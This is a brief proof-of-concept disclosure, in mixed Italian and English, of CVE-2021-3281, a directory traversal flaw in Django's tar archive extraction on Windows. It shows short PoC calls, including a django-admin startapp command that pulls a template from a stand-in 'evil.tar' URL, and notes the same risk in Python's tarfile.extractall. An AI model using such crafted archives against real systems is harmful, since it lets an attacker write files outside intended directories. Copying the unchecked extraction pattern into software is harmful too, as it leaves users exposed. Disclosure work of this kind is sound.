
Proof-of-concept per CVE-2021-3281: vulnerabilità di directory traversal nell'utility TarArchive di Django tramite file tar appositamente creati, con dimostrazione del modulo Python tarfile.
Esiste una vulnerabilità di Directory Traversal in django.utils.archive.py, riga 171, nella classe TarArchive.
La chiamata di funzione os.path.join(to_path, name) non controlla il parametro "name"; se qualcuno usa questa utility su piattaforma Windows, c'è un rischio di Directory Traversal. Il POC è:
from django.utils import archive
archive.extract('test.tar','.')
The test.tar include file named "d:game.exe",and the poc will create a file named "game.exe" in D://game.exe rather than "."
It looks like the Django core didn't use this util,but I still think it's a risk,maybe someone will use this util in webapp to archive somethings.``and there is another scene:``"djangoadmin startapp --template" command will use archive.py,see in https://docs.djangoproject.com/en/3.1/ref/django-admin/#s-startapp. POC is:
django-admin.exe startapp vulapp --template="C:/my_templates/test.tar"
It'll create a file named "game.exe" in D://game.exe rather than "vulapp/", It also accept URLs like "django-admin.exe startapp vulapp --template=https://xxx.com/evil.tar"
from django.utils import archive
archive.extract('test.tar','.')
C'è lo stesso problema in Python/Lib/tarfile.py:
#Lib/tarfile.py:
import tarfile
tar=tarfile.open('test.tar','r')
tar.extractall('.')
tar.close()
e la documentazione fornisce un avviso, vedi https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall